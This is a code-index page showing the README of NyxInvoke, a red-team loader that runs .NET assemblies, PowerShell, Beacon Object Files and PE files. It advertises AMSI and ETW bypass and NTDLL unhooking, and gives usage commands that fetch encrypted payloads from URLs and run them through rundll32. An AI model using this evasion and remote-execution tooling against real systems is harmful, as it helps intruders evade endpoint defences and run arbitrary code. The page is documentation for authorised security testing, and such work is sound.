MCPcopy Index your code
hub / github.com/BlackSnufkin/NyxInvoke

github.com/BlackSnufkin/NyxInvoke @main

Chat with this repo
repository ↗ · DeepWiki ↗ · + Follow
61 symbols 132 edges 6 files 19 documented · 31%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

NyxInvoke

NyxInvoke is a versatile Rust-based tool designed for executing .NET assemblies, PowerShell commands/scripts, Beacon Object Files (BOFs) and PE files with built-in Ntdll Unhooking, patchless AMSI and ETW bypass capabilities. It can be compiled as either a standalone executable or a DLL.

Features

  • Execute .NET assemblies
  • Run PowerShell commands or scripts
  • Load and execute Beacon Object Files (BOFs)
  • Load and execute PE Files (EXEs)
  • Built-in patchless AMSI (Anti-Malware Scan Interface) bypass
  • Built-in patchless ETW (Event Tracing for Windows) bypass
  • Built-in NTDLL unhook without triggering the "PspCreateProcessNotifyRoutine" callback
  • Support for encrypted payloads with AES decryption
  • Flexible input options: local files, URLs, or compiled-in data
  • Dual-build support: can be compiled as an executable or a DLL

Building

NyxInvoke can be built as either an executable or a DLL. Use the following commands:

Executable

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

To include compiled-in CLR, BOF or PE data, add the respective features:

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

or

cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

Usage

Executable Mode

The executable supports three main modes of operation:

  1. CLR Mode (.NET assembly execution)
  2. PowerShell Mode
  3. BOF Mode (Beacon Object File execution)
  4. PE Mode (PE File execution)

General Syntax

NyxInvoke.exe <mode> [OPTIONS]

Where <mode> is one of: clr, ps, bof or pe.

DLL Mode

When compiled as a DLL, NyxInvoke can be executed using rundll32. The syntax is:

rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

Mode-Specific Options

  1. CLR Mode:
Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
  -a, --args <ARGS>...            Arguments to pass to the assembly
  -b, --base <URL_OR_PATH>        Base URL or path for resources
  -k, --key <KEY_FILE>            Path to the encryption key file
  -i, --iv <IV_FILE>              Path to the initialization vector (IV) file
  -f, --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -u, --unencrypted               Whether the assembly is unencrypted (default is encrypted)
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. BOF Mode:
Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the BOF
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -u, --unencrypted         Whether the BOF is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PE Mode:
Execute Portable Executable (PE) files

Usage: NyxInvoke.exe pe [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the PE
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --pe <PE_FILE>        Path or URL to the encrypted PE file to execute
  -u, --unencrypted         Whether the PE is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PowerShell Mode:
Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
  -c, --command <PS_COMMAND>  PowerShell command to execute
  -s, --script <PS_SCRIPT>    Path or URL to the PowerShell script to execute
  -h, --help                  Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

Examples

Executable Mode

  1. CLR Mode (Remote Execution): NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2

  2. PowerShell Mode (Script Execution): NyxInvoke.exe ps --script C:\path\to\script.ps1

  3. BOF Mode (Local Execution): NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"

  4. PE Mode (Compiled Execution): NyxInvoke.exe pe --args arg1

DLL Mode

  1. CLR Mode (Remote Execution): rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2

  2. PowerShell Mode (Direct Command Execution): rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"

  3. BOF Mode (Compiled Execution): rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"

  4. PE Mode (Local Execution Unencrypted): rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2

Test Resources

In the resources directory, you'll find several files to test NyxInvoke's functionality:

  1. Encrypted CLR Assembly (Seatbelt):
  2. File: clr_data.enc
  3. Description: An encrypted version of the Seatbelt tool, a C# project for gathering system information.
  4. Usage example: NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus

  5. Encrypted BOF (Directory Listing):

  6. File: bof_data.enc
  7. Description: An encrypted Beacon Object File that List user permissions for the specified file, wildcards supported.
  8. Usage example: NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"

  9. Encrypted PE (Message Box):

  10. File: pe_data.enc
  11. Description: An encrypted PE File that pop up message box.
  12. Usage example: NyxInvoke.exe pe
  13. Powershell (Message Box):
  14. File: ps.ps1
  15. Description: An Powershell script that pop up message box.
  16. Usage example: NyxInvoke.exe ps -s http://example.com/ps.ps1

Screenshot

  • Dll Compiled CLR Executaion

Screenshot 2024-09-18 123147

  • EXE Remote BOF Executaion

Screenshot 2024-09-18 123410

  • Dll Compiled EXE Executaion

pe

  • Dll Powershell Script Executaion

Screenshot 2024-09-18 123547

Legal Notice

This tool is for educational and authorized testing purposes only. Ensure you have proper permissions before use in any environment.

Credits

  • @yamakadi for the clroxide project
  • @hakaioffsec for the coffee project

Core symbols most depended-on inside this repo

offset
called by 18
src/runpe.rs
get_ntdll_func
called by 10
src/unhook.rs
fetch_or_read_file
called by 9
src/common.rs
write_to_console
called by 4
src/common.rs
setup_bypass
called by 4
src/patch.rs
aes_decrypt
called by 3
src/common.rs
set_bits
called by 3
src/patch.rs
runspace_execute
called by 2
src/common.rs

Shape

Function 47
Method 8
Class 5
Enum 1

Languages

Rust100%

Modules by API surface

src/common.rs19 symbols
src/runpe.rs16 symbols
src/patch.rs16 symbols
src/unhook.rs6 symbols
src/lib.rs3 symbols
src/main.rs1 symbols

For agents

$ claude mcp add NyxInvoke \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact